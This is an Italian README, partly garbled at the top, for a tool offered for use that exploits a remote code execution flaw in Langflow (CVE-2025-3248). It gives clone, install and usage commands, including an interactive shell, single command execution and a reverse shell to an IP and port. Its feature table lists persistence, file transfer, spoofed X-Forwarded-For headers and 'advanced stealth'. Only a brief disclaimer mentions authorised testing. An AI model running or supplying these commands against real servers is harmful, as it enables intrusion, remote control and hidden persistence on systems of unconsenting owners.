
Exploit di Esecuzione Remota di Codice per Langflow (CVE-2025-3248) - [ Di S4Tech ]
Exploit di Remote Code Execution per Langflow (CVE-2025-3248)
persist)upload local_path remote_pathdownload remote_path local_pathclear per il terminaleUser-Agent casualeX-Forwarded-For falsificatiexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [opzioni]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ Questo strumento è solo per scopi educativi e di test autorizzati.
⚠️ L'uso non autorizzato contro sistemi di cui non si è proprietari o per cui non si ha il permesso di testare è illegale.
Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.
I pull request sono benvenuti. Per modifiche importanti, apri prima un issue per discutere cosa vorresti cambiare.
| Funzionalità | v1.0 | v2.0 |
|---|
| Metodi payload | 1 | 5 |
| Trasferimento file | ❌ Non supportato | ✅ Supportato |
| Persistenza | ❌ | ✅ |
| Livello di stealth | Base | Avanzato |
| Registrazione sessione | ❌ | ✅ |
| Opzione | Descrizione |
|---|
--shell | Avvia shell interattiva |
--reverse IP PORT | Avvia reverse shell verso IP:PORT specificato |
--command CMD | Esegue un singolo comando |
--verbose | Abilita output dettagliato |
--timeout SEC | Imposta timeout richiesta (predefinito: 10s) |